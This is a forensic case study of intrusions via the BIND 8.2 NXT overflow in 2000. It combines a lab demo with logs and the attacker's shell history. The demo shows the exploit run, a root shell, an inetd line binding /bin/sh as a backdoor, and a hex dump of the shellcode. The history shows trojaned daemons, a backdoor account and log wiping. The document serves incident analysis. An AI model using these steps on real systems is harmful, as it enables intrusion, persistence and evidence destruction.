Security Analysis of Linux BIND 8.2 nxt bug hacking (Case II)
Summary
Hacker compromised
| victim1.ie
| (137.189.victim1)
|
| victim2.ie
| (137.189.victim2)
|
| Victim_Net previous intranet gateway
| (137.189.victim3)
|
| Victim_Net current Mail server
| (137.189.vicitm4)
|
via BIND 8.2 nxt bug on
22nd Feb 2000.
The hacker first set up a trap at a DNS server (xx0.yy0.33.45) of a certain
domain. He/she started up his/her hacker program binded at 53 port and waiting
for the victim DNS query. When the hacker make the victim host to DNS query the
hacker host (says using nslookup), the hacker program at the hacker DNS server
will buffer overflow the victim host and get the root access by starting up a
root shell.
See
http://www.cert.org/advisories/CA-99-14-bind.html
A simple demo to show how it works
| Hacker domain
| bait.hkntec.net
|
Hacker DNS server
(i.e. DNS server of bait.hkntec.net
domain)
| ntec24.arm.hkntec.net (192.168.64.24)
|
Victim host
(host running BIND 8.2 named,
whether it is DNS
server or not,
it doesn't matter)
| victim.fox.hkntec.net (192.168.128.50) |
The hacker needs to point the hacker domain (bait.hkntec.net) to the hacker
host (192.168.64.24) first.
; Data file of hostnames in this zone.
;
@ IN SOA hkntec.net. shlam.ie.cuhk.edu.hk. (
2000007102 ; serial, todays date + todays serial #
300 ; refresh, seconds
60 ; retry, seconds
1W ; expire, seconds
8H ) ; minimum, seconds
NS ns.hkntec.net.
;
bait IN NS ntec24.arm.hkntec.net.
At the hacker host (192.168.64.24) try to probe the victim BIND version
and OS
root@ntec24 ~]$ dig @192.168.128.50 version.bind chaos txt | grep \"8
VERSION.BIND. 0S CHAOS TXT "8.2.1"
[root@ntec24 ~]$ telnet 192.168.128.50
Trying 192.168.128.50...
Connected to victim (192.168.128.50).
Escape character is '^]'.
Red Hat Linux release 6.1 (Cartman)
Kernel 2.2.12-20 on an i686
login:
Login incorrect
Then the hacker run the buffer overflow program. This program will bind
the domain port 53. ntec24:/tmp> ./bind_hack 1
Now at any host try to make the victim host to query bait.hkntec.net
domain
ntec4:/home/data/shlam> nslookup
Default Server: fortress.fox.hkntec.net
Address: 192.168.128.230
> server victim.fox.hkntec.net
Default Server: victim.fox.hkntec.net
Address: 192.168.128.50
> set type=ns
> bait.hkntec.net
Server: victim.fox.hkntec.net
Address: 192.168.128.50
Non-authoritative answer:
bait.hkntec.net nameserver = ntec24.arm.hkntec.net
Authoritative answers can be found from:
ntec24.arm.hkntec.net internet address = 192.168.64.24
> set type=a
> www.bait.hkntec.net
Server: victim.fox.hkntec.net
Address: 192.168.128.50
...
Now the victim host try to resolve www.bait.hkntec.net host by querying
the hacker DNS server via domain port 53.
When the victim hosts query the hacker DNS server, the hacker program will
buffer overflow the NXT record and then get a root shell at the victim host.
ntec24:/tmp> ./bind_hack 1
Received request from 192.168.128.50:1025 for www.bait.hkntec.net type=1
Entering proxyloop..
Linux victim 2.2.12-20 #1 Mon Sep 27 10:40:35 EDT 1999 i686 unknown
/
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root
hostname
victim
echo "ingreslock stream tcp nowait root /bin/sh sh -i" > /tmp/h
/usr/sbin/inetd /tmp/h
ntec24:/tmp> telnet victim ingreslock
Trying 192.168.128.50...
Connected to victim (192.168.128.50).
Escape character is '^]'.
bash# whoami
whoami
root
bash#
When you look at the tcpdump, it shows:
victim:/tmp> tcpdump -x -e -s 5000 host ntec24 | tcpf
Kernel filter, protocol ALL, datagram packet socket
14:29:52.475062 eth0 < 0:d0:9:2d:5b:79 0:0:0:0:0:1 ip 1514: ntec24.1101 > victim.domain: P 2899:4347(1448) ack 1 win 32120 (DF)
...
...
...
...
9090 9090 9090 9090 9090 9090 9090 9090 ................
9090 9090 9090 9090 9090 9090 9090 9090 ................
9090 9090 9090 9090 9090 9090 9090 9090 ................
9090 9090 9090 9090 9090 9090 9090 9090 ................
9090 9090 9090 9090 9090 9090 9090 9090 ................
9090 9090 9090 9090 9090 9090 9090 9090 ................
9090 9090 9090 9090 9090 9090 9090 9090 ................
9090 9090 9090 9090 9090 9090 9090 9090 ................
9090 9090 9090 9090 9090 9090 9090 9090 ................
9090 9090 9090 9090 9090 9090 9090 e9ac ................
0100 005e 8976 0c8d 4608 8946 108d 462e ...^.v..F..F..F.
8946 1456 eb54 5e89 f3b9 0000 0000 ba00 .F.V.T^.........
0000 00b8 0500 0000 cd80 508d 5e02 b9ff ..........P.^...
0100 00b8 2700 0000 cd80 8d5e 02b8 3d00 ....'......^..=.
0000 cd80 5b53 b885 0000 00cd 805b b806 ....[S.......[..
0000 00cd 808d 5e0b b80c 0000 00cd 8089 ......^.........
f3b8 3d00 0000 cd80 eb2c e8a7 ffff ff2e ..=......,......
0041 444d 524f 434b 5300 2e2e 2f2e 2e2f .ADMROCKS.../../
2e2e 2f2e 2e2f 2e2e 2f2e 2e2f 2e2e 2f2e ../../../../../.
2e2f 2e2e 2f00 5eb8 0200 0000 cd80 89c0 ./../.^.........
85c0 0f85 8e00 0000 89f3 8d4e 0c8d 5618 ...........N..V.
b80b 0000 00cd 80b8 0100 0000 cd80 e875 ...............u
0000 0010 0000 0000 0000 0074 6869 7369 ...........thisi
7373 6f6d 6574 656d 7073 7061 6365 666f ssometempspacefo
7274 6865 736f 636b 696e 6164 6472 696e rthesockinaddrin
7965 6168 7965 6168 696b 6e6f 7774 6869 yeahyeahiknowthi
7369 736c 616d 6562 7574 616e 7977 6179 sislamebutanyway
7768 6f63 6172 6573 686f 7269 7a6f 6e67 whocareshorizong
6f74 6974 776f 726b 696e 6773 6f61 6c6c otitworkingsoall
6973 636f 6f6c eb86 5e56 8d46 0850 8b46 iscool..^V.F.P.F
0450 ff46 0489 e1bb 0700 0000 b866 0000 .P.F.........f..
00cd 8083 c40c 89c0 85c0 75da 6683 7e08 ..........u.f.~.
0275 d38b 5604 4a52 89d3 b900 0000 00b8 .u..V.JR........
3f00 0000 cd80 5a52 89d3 b901 0000 00b8 ?.....ZR........
3f00 0000 cd80 5a52 89d3 b902 0000 00b8 ?.....ZR........
3f00 0000 cd80 eb12 5e46 4646 4646 c746 ?.......^FFFFF.F
1000 0000 00e9 fefe ffff e8e9 ffff ffe8 ................
4ffe ffff 2f62 696e 2f73 6800 2d63 00ff O.../bin/sh.-c..
ffff ffff ffff ffff ffff ffff 0000 0000 ................
706c 6167 7565 7a5b 4144 4d5d 3130 2f39 plaguez[ADM]10/9
392d 6578 6974 0090 9090 9090 9090 9090 9-exit..........
...
The real case analysis
Although there are four hosts have been compromised, we only have a chance to
exam 137.189.victim2. 137.189.victim1 was just OS upgraded before we investigate
the case. 137.189.victim3 and 137.189.vicitm4 are under Victim_Net management. Victim_Net
do not show any response of this investigation. Hence, we can only exam
137.189.victim2 which remains quite intact after the break-in.
Chronology
Feb 22nd
0222.07:41:46.488 0222.07:41:49.904 137.189.victim2 xxx.252.35.201 06 23( telnet ) 1555 ( ) 10 520
0222.07:42:18.788 0222.07:42:21.648 137.189.victim2 xxx.252.35.201 06 23( telnet ) 1558 ( ) 9 480
The hacker probably had scanned the 137.189.victim2 and found that the named port was open.
He/she telnet the 137.189.victim2 to identify the OS of 137.189.victim2.
0222.07:42:57.760 0222.07:42:57.760 137.189.victim2 yyy.63.2.53 11 1024( ) 53 ( domain ) 1 63
0222.07:43:01.464 0222.07:43:01.464 137.189.victim2 yyy.8.10.90 11 1014( ) 53 ( domain ) 1 63
0222.07:43:01.900 0222.07:43:02.760 137.189.victim2 xx0.yy0.33.40 11 1024( ) 53 ( domain ) 2 126
0222.07:43:05.464 0222.07:43:06.464 137.189.victim2 xx0.yy0.33.45 11 1024( ) 53 ( domain ) 2 126
The hacker made 137.189.victim2 to query the hacker domain and then connect to hacker host (xx0.yy0.33.45)
0222.07:43:05.872 0222.07:43:30.544 137.189.victim2 xx0.yy0.33.45 06 53( domain ) 2212 ( ) 13 795
Buffer overflow the 137.189.victim2 named
0222.07:43:32.808 0222.07:43:32.808 137.189.victim2 xx0.yy0.33.45 01 0( ) 771 ( rtip ) 1 91
0222.07:43:41.yyy. 0222.07:43:55.hh. 137.189.victim2 xxx.252.35.201 06 23( telnet ) 1559 ( ) 31 1517
Ping 137.189.victim2 and then telnet to 137.189.victim2 via his/her establish back door.
0222.13:14:46.594 0222.13:14:46.594 137.189.victim2 uuu.254.23.184 06 1109( ) 113 ( auth ) 1 60
0222.13:14:46.82 0222.13:14:46.82 137.189.victim2 uuu.254.23.184 06 21( ftp ) 1562 ( ) 1 60
0222.13:14:51.202 0222.13:14:52.614 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1563 ( ) 5 1137
0222.13:15:21.838 0222.13:15:hh.310 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1570 ( ) 5 1207
0222.13:15:16.718 0222.13:15:19.362 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1565 ( ) 8 424
0222.13:15:38.774 0222.13:15:40.270 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1574 ( ) 5 1343
0222.13:15:34.634 0222.13:15:36.842 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1573 ( ) 6 320
0222.13:15:27.770 0222.13:15:33.190 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1572 ( ) 17 892
0222.13:14:47.34 0222.13:15:43.690 137.189.victim2 uuu.254.23.184 06 21( ftp ) 1562 ( ) 46 3742
0222.12:57:57.174 0222.13:16:38.358 137.189.victim2 uuu.254.23.184 06 23( telnet ) 1539 ( ) 841 119148
0222.13:17:12.918 0222.13:17:12.918 137.189.victim2 uuu.254.23.184 06 1110( ) 113 ( auth ) 1 60
0222.13:17:11.874 0222.13:17:11.874 137.189.victim2 uuu.254.23.184 06 21( ftp ) xxx6 ( ) 1 60
0222.13:17:34.153 0222.13:17:35.533 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1591 ( ) 5 268
0222.13:17:30.805 0222.13:17:32.345 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1590 ( ) 5 1405
0222.13:17:27.513 0222.13:17:28.933 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) xxx9 ( ) 5 268
0222.13:17:19.637 0222.13:17:21.169 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) xxx8 ( ) 5 1344
0222.13:17:14.305 0222.13:17:38.341 137.189.victim2 uuu.254.23.184 06 21( ftp ) xxx6 ( ) 36 2923
0222.13:17:37.421 0222.13:17:38.853 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1592 ( ) 5 1464
0222.13:17:32.429 0222.13:18:15.77 137.189.victim2 uuu.254.23.184 06 23( telnet ) 1539 ( ) 8 1738
then a lots of FTP transfer
0222.13:29:51.371 0222.13:29:57.515 137.189.victim2 ggg.233.ttt.6 06 1116( ) 6667 ( ) 8 638
0222.13:30:25.231 0222.13:30:25.563 137.189.victim2 rrr.37.45.2 06 113( auth ) 1434 ( ) 3 124
0222.13:30:54.755 0222.13:30:55.215 137.189.victim2 vvv.161.0.254 06 113( auth ) 1148 ( ) 3 124
0222.13:30:54.291 0222.13:30:56.151 137.189.victim2 vvv.161.0.254 06 1118( ) 6667 ( ) 6 358
0222.13:30:hh.911 0222.13:31:13.183 137.189.victim2 rrr.37.45.2 06 1117( ) 6667 ( ) 11 705
0222.13:31:22.795 0222.13:31:hh.615 137.189.victim2 ttt.116.202.42 06 113( auth ) 2143 ( ) 3 152
0222.13:31:22.187 0222.13:31:29.215 137.189.victim2 ttt.116.202.42 06 1119( ) 6667 ( ) 7 489
0222.13:31:39.839 0222.13:31:40.267 137.189.victim2 vvv.154.rrr.hh. 06 113( auth ) 2661 ( ) 3 124
0222.13:31:39.427 0222.13:31:41.67 137.189.victim2 vvv.154.rrr.hh. 06 1120( ) 6667 ( ) 6 362
0222.13:32:00.695 0222.13:32:00.695 137.189.victim2 rrr.37.45.2 06 1117( ) 6667 ( ) 1 74
0222.13:32:00.959 0222.13:32:01.363 137.189.victim2 vvv.159.0.90 06 113( auth ) 1061 ( ) 3 124
0222.13:32:00.547 0222.13:32:02.279 137.189.victim2 vvv.159.0.90 06 1121( ) 6667 ( ) 5 324
0222.13:32:37.843 0222.13:32:38.vvv. 137.189.victim2 fff.163.216.60 06 113( auth ) fff. ( ) 3 164
0222.13:32:37.191 0222.13:32:41.895 137.189.victim2 fff.163.216.60 06 1122( ) 6667 ( ) 8 551
0222.13:32:54.43 0222.13:32:54.387 137.189.victim2 fff.164.211.2 06 113( auth ) 46hh. ( ) 3 124
0222.13:32:53.735 0222.13:32:58.135 137.189.victim2 fff.164.211.2 06 1123( ) 6667 ( ) 7 488
0222.13:33:31.947 0222.13:33:34.419 137.189.victim2 hh.8.4.32 06 1080( ) 3359 ( ) 4 160
0222.13:33:35.723 0222.13:33:35.723 137.189.victim2 rrr.37.45.2 06 1117( ) 6667 ( ) 1 74
0222.13:33:23.167 0222.13:34:11.839 137.189.victim2 199.2.32.11 06 113( auth ) 52273 ( ) 7 284
0222.13:21:27.603 0222.13:34:hh.839 137.189.victim2 uuu.254.23.184 06 23( telnet ) 1539 ( ) 762 61422
0222.13:33:22.443 0222.13:34:52.7 137.189.victim2 199.2.32.11 06 11hh. ) 6667 ( ) 22 mmm.
Start the IRC bot at 6667 port
The other three hosts were also compromised on 22nd Feb
137.189.victim3
0222.06:12:40.939 0222.06:12:41.263 137.189.victim3 hh.8.44.15 06 53( domain ) 4339 ( ) 3 164
0222.06:25:53.937 0222.06:25:53.937 137.189.victim3 hh.8.44.15 11 53( domain ) 1899 ( ) 1 86
0222.07:35:39.409 0222.07:35:42.585 137.189.victim3 xxx.252.35.201 06 23( telnet ) 1547 ( ) 10 520
0222.07:36:14.829 0222.07:36:14.829 137.189.victim3 fff.41.0.4 11 1028( ) 53 ( domain ) 1 45
0222.07:36:14.485 0222.07:36:14.485 137.189.victim3 ttt.112.36.4 11 1028( ) 53 ( domain ) 1 64
0222.07:36:22.157 0222.07:36:42.157 137.189.victim3 xx0.yy0.33.40 11 1028( ) 53 ( domain ) 2 128
0222.07:36:14.829 0222.07:36:50.157 137.189.victim3 xx0.yy0.33.45 11 1028( ) 53 ( domain ) 3 ttt
0222.07:36:18.157 0222.07:37:06.157 137.189.victim3 xx0.yy0.33.42 11 1028( ) 53 ( domain ) 3 ttt
0222.07:37:38.157 0222.07:37:38.157 137.189.victim3 xx0.yy0.33.45 11 53( domain ) 3003 ( ) 1 64
0222.07:37:22.157 0222.07:37:58.157 137.189.victim3 xx0.yy0.33.40 11 1028( ) 53 ( domain ) 2 127
0222.07:37:54.157 0222.07:37:54.157 137.189.victim3 xx0.yy0.33.42 11 1028( ) 53 ( domain ) 1 63
0222.07:37:50.305 0222.07:38:02.157 137.189.victim3 xx0.yy0.33.45 11 1028( ) 53 ( domain ) 2 126
0222.07:38:32.449 0222.07:38:32.449 137.189.victim3 xx0.yy0.33.45 01 0( ) 771 ( rtip ) 1 91
0222.07:38:02.565 0222.07:38:19.521 137.189.victim3 xx0.yy0.33.45 06 53( domain ) 2208 ( ) 13 795
0222.07:38:33.708 0222.07:39:01.640 137.189.victim3 xxx.252.35.201 06 23( telnet ) 1548 ( ) 55 2611
0222.11:45:05.207 0222.11:45:06.695 137.189.victim3 137.189.hh..152 06 139(netbios-s) 2289 ( ) 4 160
0222.11:45:06.707 0222.11:45:09.711 137.189.victim3 137.189.hh..152 01 0( ) 771 ( rtip ) 3 318
0222.12:33:10.52 0222.12:34:33.676 137.189.victim3 xxx.252.36.43 06 23( telnet ) 1056 ( ) 219 50268
137.189.vicitm4
0222.06:12:40.107 0222.06:13:25.431 137.189.vicitm4 hh.8.44.15 06 53( domain ) 4297 ( ) 7 372
0222.06:14:13.431 0222.06:14:13.431 137.189.vicitm4 hh.8.44.15 06 53( domain ) 4297 ( ) 1 52
0222.06:15:49.427 0222.06:15:49.427 137.189.vicitm4 hh.8.44.15 06 53( domain ) 4297 ( ) 1 52
0222.06:25:53.897 0222.06:25:53.897 137.189.vicitm4 hh.8.44.15 11 53( domain ) 1895 ( ) 1 86
0222.07:29:00.330 0222.07:29:04.78 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1536 ( ) 11 566
0222.07:30:50.169 0222.07:30:52.961 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1538 ( ) 9 486
0222.07:31:04.49 0222.07:31:04.49 137.189.vicitm4 yyy.8.10.90 11 10hh. ) 53 ( domain ) 1 64
0222.07:31:04.693 0222.07:31:04.693 137.189.vicitm4 ttt.5.5.hh. 11 10hh. ) 53 ( domain ) 1 45
0222.07:31:12.601 0222.07:31:32.601 137.189.vicitm4 xx0.yy0.33.40 11 10hh. ) 53 ( domain ) 2 128
0222.07:31:04.693 0222.07:31:40.601 137.189.vicitm4 xx0.yy0.33.45 11 10hh. ) 53 ( domain ) 3 ttt
0222.07:31:51.565 0222.07:31:52.817 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1538 ( ) 2 80
0222.07:31:08.601 0222.07:31:56.601 137.189.vicitm4 xx0.yy0.33.42 11 10hh. ) 53 ( domain ) 3 ttt
0222.07:32:12.601 0222.07:32:12.601 137.189.vicitm4 xx0.yy0.33.40 11 10hh. ) 53 ( domain ) 1 64
0222.07:32:16.301 0222.07:32:33.201 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1540 ( ) 28 1334
0222.07:32:28.601 0222.07:32:28.601 137.189.vicitm4 xx0.yy0.33.45 11 53( domain ) 3003 ( ) 1 64
0222.07:32:47.577 0222.07:32:57.129 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1541 ( ) 20 988
137.189.victim1
0222.07:39:52.384 0222.07:39:52.384 137.189.victim1 ttt.5.5.hh. 11 10hh. ) 53 ( domain ) 1 63
0222.07:39:52.560 0222.07:40:04.152 137.189.victim1 xx0.yy0.33.40 11 10hh. ) 53 ( domain ) 2 126
0222.07:39:57.44 0222.07:40:00.hh. 137.189.victim1 xxx.252.35.201 06 23( telnet ) 1551 ( ) 10 526
0222.07:39:56.152 0222.07:40:12.152 137.189.victim1 xx0.yy0.33.42 11 10hh. ) 53 ( domain ) 2 126
0222.07:40:00.152 0222.07:40:20.152 137.189.victim1 xx0.yy0.33.45 11 10hh. ) 53 ( domain ) 2 126
0222.07:40:29.792 0222.07:40:29.792 137.189.victim1 sss.188.179.38 11 1033( ) 4000 ( ) 1 38
0222.07:40:20.620 0222.07:40:35.116 137.189.victim1 xx0.yy0.33.45 06 53( domain ) 2211 ( ) 14 847
0222.07:40:52.300 0222.07:40:52.300 137.189.victim1 xx0.yy0.33.45 01 0( ) 771 ( rtip ) 1 91
0222.07:41:13.328 0222.07:41:32.996 137.189.victim1 xxx.252.35.201 06 23( telnet ) 1552 ( ) 45 2131
This the ftp tranfer to mcgill U. It matches the information provided by mcgill U.
0222.12:57:46.837 0222.12:58:35.685 137.189.victim1 sss.188.153.116 11 1027( ) 4000 ( ) 4 156
0222.12:58:25.737 0222.12:58:25.737 137.189.victim1 mmm.206.73.143 06 1058( ) 21 ( ftp ) 1 52
0222.12:58:32.517 0222.12:58:32.797 137.189.victim1 mmm.206.73.143 06 113( auth ) 3211 ( ) 3 164
0222.12:58:33.72 0222.12:58:53.756 137.189.victim1 mmm.206.73.143 06 1058( ) 21 ( ftp ) 9 506
0222.12:59:04.464 0222.12:59:04.464 137.189.victim1 mmm.206.73.143 06 1061( ) 20 (ftp-data ) 1 60
0222.12:58:55.396 0222.12:58:55.700 137.189.victim1 mmm.206.73.143 06 1060( ) 21 ( ftp ) 2 112
0222.12:59:11.160 0222.12:59:11.160 137.189.victim1 mmm.206.73.143 06 1063( ) 20 (ftp-data ) 1 60
0222.12:59:04.796 0222.12:59:04.796 137.189.victim1 mmm.206.73.143 06 1061( ) 20 (ftp-data ) 3 156
0222.12:58:56.36 0222.12:58:56.360 137.189.victim1 mmm.206.73.143 06 113( auth ) 3213 ( ) 3 164
0222.12:59:11.432 0222.12:59:11.432 137.189.victim1 mmm.206.73.143 06 1063( ) 20 (ftp-data ) 3 156
0222.12:58:56.688 0222.12:59:39.520 137.189.victim1 mmm.206.73.143 06 1060( ) 21 ( ftp ) 26 1542
0222.12:59:38.932 0222.12:59:38.932 137.189.victim1 mmm.206.73.143 06 1076( ) 20 (ftp-data ) 1 60
0222.12:59:39.200 0222.12:59:39.200 137.189.victim1 mmm.206.73.143 06 1076( ) 20 (ftp-data ) 3 156
0222.12:59:29.108 0222.12:59:29.108 137.189.victim1 mmm.206.73.143 06 1065( ) 20 (ftp-data ) 3 156
0222.12:59:28.820 0222.12:59:28.820 137.189.victim1 mmm.206.73.143 06 1065( ) 20 (ftp-data ) 1 60
0222.12:57:48.308 0222.12:59:39.876 137.189.victim1 xxx.252.36.43 06 23( telnet ) 1062 ( ) 102 8782
0222.12:59:33.384 0222.12:59:46.832 137.189.victim1 sss.188.153.116 11 1027( ) 4000 ( ) 2 76
0222.13:01:09.916 0222.13:01:11.308 137.189.victim1 xxx.252.36.43 06 23( telnet ) 1062 ( ) 5 211
0222.13:02:02.892 0222.13:02:02.892 137.189.victim1 sss.188.153.116 11 1027( ) 4000 ( ) 1 38
0222.13:03:10.716 0222.13:03:10.716 137.189.victim1 mmm.206.73.143 06 1086( ) 20 (ftp-data ) 1 60
0222.13:03:01.656 0222.13:03:hh.328 137.189.victim1 mmm.206.73.143 06 1060( ) 21 ( ftp ) 15 915
0222.13:03:20.308 0222.13:03:20.580 137.189.victim1 mmm.206.73.143 06 1087( ) 20 (ftp-data ) 5 260
0222.13:03:10.1000 0222.13:03:11.944 137.189.victim1 mmm.206.73.143 06 1086( ) 20 (ftp-data ) 12 624
0222.13:03:20.32 0222.13:03:20.32 137.189.victim1 mmm.206.73.143 06 1087( ) 20 (ftp-data ) 1 60
0222.13:03:46.8hh. 0222.13:03:46.8hh. 137.189.victim1 sss.188.153.116 11 1027( ) 4000 ( ) 1 38
0222.13:03:01.656 0222.13:04:02.652 137.189.victim1 xxx.252.36.43 06 23( telnet ) 1062 ( ) 131 7300
0222.13:05:hh.331 0222.13:05:25.211 137.189.victim1 xxx.252.36.43 06 23( telnet ) 1062 ( ) 4 184
cove ftp victim1.ie.cuhk. Mon Feb 21 23:59 - 00:03 (00:04)
Mon Feb 21 23:59:28 2000 1 victim1.ie.cuhk.edu.hk 494 /tmp/egg/specialk.conf b _ o r cove ftp 0 * c
Mon Feb 21 23:59:39 2000 1 victim1.ie.cuhk.edu.hk 749 /tmp/egg/motd b _ o r cove ftp 0 * c
Tue Feb 22 00:03:10 2000 1 victim1.ie.cuhk.edu.hk 28hh. /tmp/egg/special-k.tcl b _ o r cove ftp 0 * c
Tue Feb 22 00:03:20 2000 1 victim1.ie.cuhk.edu.hk 6483 /tmp/egg/BitchX1.1.tcl b _ o r cove ftp 0 * c
(All times are North American Eastern, -0500 from UTC.)
Feb 22nd - afterwards
137.189.victim2 was running eggdrop IRC bot
April 7th
Get the security alert from McGill U and start investigation.
Hacker Activities at 137.189.victim2
From the /.bash_history, we pick up this:
whoami
less /var/log/secure
pico -w /var/log/secure
change the logging
w
ls
top
cat /etc/passwd
ls /data/home/ansers
ls /home/testtube
netstat
uptime
finger ansers
finger testtube
finger eric
finger recruit
ls /data
df
ls /data2
ls /
ls /download
cd ..
cd sbin
ls
ls -F
ls --color
cd ..
ls
cd etc
ls
cd ..
ls
ls bin
ls home
ls
ls mnt
ls mnt/cdrom
ls pef1
ls usr
cd usr/sbin
ls --color
cd ..
cd ..
ls
cd var
ls -F
cd ..
ls root
ls root -la
ls
ls bin -F
check out the system environment
ls
cd dev
ls
cd ..
ls
cd dev
mkdir e
cd e
ncftp
ls
tar -zxvf eggdrop1.4.2.tar.gz
cd eggdrop1.4.2
./configure
make
cp /tmp/hed .
ls /tmp
rm /tmp/hed
mv /tmp/BitchX1.1.tcl ./scripts/
mv /tmp/special-k.tcl ./scripts/
mv /tmp/wh0r3.tcl ./scripts/
mv /tmp/motd ./
ls /tmp
ls
pico -w hed
rm hed
w
ls
./assgroove
chmod u+x groove
chmod u+x assgroove
./assgroove
pwd
./eggdrop
./eggdrop -m assgroove
telnet localhost 2012
Build and run the eggdrop
w
cd scripts/
pico -w botchk
cd ..
ls -la
ps x
ls
mv assgroove in.telnetd
pico -w scripts/botchk
cd ..
./in.telnetd
ls -la in.tel
ls -la in.telnetd
ls
cd eggdrop1.4.2
./in.telnetd
ls -la in.telnetd
chmod +x in.telnetd
pico -w in.telnetd
pico -w in.telnetd
pico -w cron
crontab cron
crontab -l
scrbotchk
./scripts/botchk
ls
./in.telnetd
ls in.telnetd
ls -la in.telnetd
mv eggdrop in.ftpd
./scripts/botchk
Build the telnet trojan horse
cd /
cd var/log
pico -w secure
ls
cat messages
ls
rm wtmp
last
mv wtmp.1 wtmp
tail xferlog
pico -w xferlog
ls
cd /root
ls
ls -la
history
rm .history
clear the log
exit
useradd
adduser
/sbin/useradd
/sbi/nadduser
/sbin/adduser
/usr/local/sbin/adduser
/usr/local/sbin/useradd
locate
locate useradd
/usr/sbin/useradd
/usr/sbin/useradd deamon -d /tmp
cat /etc/passwd
chpasswd
passwd deamon
pico -w /etc/passwd
create backdoor account
w
w
cd /var/log
pico -w secure
w
exit
pico -w secure
ls
cat xferlog
rm xferlog
ls
cat lastlog
ls
last
lastlog
rm lastlog
ls
mv wtmp.1 wtmp
clear the log
locate egg
cd /dev/e/eggdrop1.4.2
mv /tmp/special-k.1.pre2.tcl ./scripts/
ls
cat in.ftpd
ps x
pico -w in.telnetd
logout
exit
cp /var/log/wtmp.1 /var/log/wtmp
cd /dev/e
ls
ncftp
w
cd /var/log
ls
tail secure
rm secure
dd > secure
cat xferlog.1
ls
exit
clear the log
The files that the hacker may touch up on that day (22nd Feb)
Access time Modification time
Mon Apr 10 12:07:55 2000 Tue Feb 22 13:51:27 2000 /
Mon Apr 10 12:07:55 2000 Tue Feb 22 16:16:54 2000 /data/home/ansers/source_code/ansers_dir/src_4
Mon Apr 10 12:07:56 2000 Tue Feb 22 16:03:hh.2000 /data/home/ansers/source_code/jasmine_dir/text
Mon Apr 10 12:07:56 2000 Tue Feb 22 15:51:11 2000 /data/home/ansers/public_html/DDL
Mon Apr 10 12:07:56 2000 Tue Feb 22 15:51:25 2000 /data/home/ansers/public_html/include
Fri Mar 31 23:52:02 2000 Tue Feb 22 15:53:06 2000 /data/home/ansers/public_html/cmpl
Thu Feb hh.19:50:23 2000 Tue Feb 22 11:58:07 2000 /data/home/ansers/public_html/C_prog/upload_batld.c
Wed Mar 1 22:03:03 2000 Tue Feb 22 11:59:55 2000 /data/home/ansers/public_html/C_prog/upload_batle.c
Thu Feb hh.19:51:33 2000 Tue Feb 22 11:58:19 2000 /data/home/ansers/public_html/upload_batld
Thu Feb hh.19:51:33 2000 Tue Feb 22 12:00:23 2000 /data/home/ansers/public_html/upload_batle
Fri Apr 7 04:08:38 2000 Tue Feb 22 13:09:18 2000 /dev/e
Fri Apr 7 04:08:38 2000 Tue Feb 22 13:09:54 2000 /dev/e/eggdrop1.4.2/doc
Tue Feb 22 13:09:54 2000 Tue Feb 22 13:09:55 2000 /dev/e/eggdrop1.4.2/doc/Makefile
Fri Apr 7 03:11:39 2000 Tue Feb 22 13:14:26 2000 /dev/e/eggdrop1.4.2/motd
Mon Apr 10 12:10:00 2000 Tue Feb 22 13:42:16 2000 /dev/e/eggdrop1.4.2/scripts/botchk
Tue Feb 22 13:09:55 2000 Tue Feb 22 13:09:55 2000 /dev/e/eggdrop1.4.2/scripts/Makefile
Mon Apr 10 11:50:01 2000 Tue Feb 22 13:12:16 2000 /dev/e/eggdrop1.4.2/scripts/BitchX1.1.tcl
Mon Mar 27 06:18:10 2000 Tue Feb 22 13:12:30 2000 /dev/e/eggdrop1.4.2/scripts/special-k.tcl
Tue Apr 4 12:31:55 2000 Tue Feb 22 13:12:34 2000 /dev/e/eggdrop1.4.2/scripts/wh0r3.tcl
Fri Apr 7 04:08:38 2000 Tue Feb 22 13:13:21 2000 /dev/e/eggdrop1.4.2/src
Fri Apr 7 04:08:38 2000 Tue Feb 22 13:13:hh.2000 /dev/e/eggdrop1.4.2/src/md5
Tue Feb 22 13:13:21 2000 Tue Feb 22 13:09:56 2000 /dev/e/eggdrop1.4.2/src/md5/Makefile
Tue Feb 22 13:13:26 2000 Tue Feb 22 13:13:25 2000 /dev/e/eggdrop1.4.2/src/md5/md5c.o
Fri Apr 7 04:08:38 2000 Tue Feb 22 13:17:27 2000 /dev/e/eggdrop1.4.2/src/mod
Fri Apr 7 04:08:38 2000 Tue Feb 22 13:13:30 2000 /dev/e/eggdrop1.4.2/src/mod/assoc.mod
Fri Apr 7 04:08:38 2000 Tue Feb 22 13:13:35 2000 /dev/e/eggdrop1.4.2/src/mod/blowfish.mod
Fri Apr 7 04:08:38 2000 Tue Feb 22 13:14:30 2000 /dev/e/eggdrop1.4.2/src/mod/channels.mod
Fri Apr 7 04:08:38 2000 Tue Feb 22 13:14:34 2000 /dev/e/eggdrop1.4.2/src/mod/console.mod
Fri Apr 7 04:08:38 2000 Tue Feb 22 13:14:38 2000 /dev/e/eggdrop1.4.2/src/mod/ctcp.mod
Fri Apr 7 04:08:38 2000 Tue Feb 22 13:15:12 2000 /dev/e/eggdrop1.4.2/src/mod/filesys.mod
Fri Apr 7 04:08:38 2000 Tue Feb 22 13:16:06 2000 /dev/e/eggdrop1.4.2/src/mod/irc.mod
Fri Apr 7 04:08:38 2000 Tue Feb 22 13:16:17 2000 /dev/e/eggdrop1.4.2/src/mod/notes.mod
Fri Apr 7 04:08:38 2000 Tue Feb 22 13:16:23 2000 /dev/e/eggdrop1.4.2/src/mod/seen.mod
Fri Apr 7 04:08:38 2000 Tue Feb 22 13:16:44 2000 /dev/e/eggdrop1.4.2/src/mod/server.mod
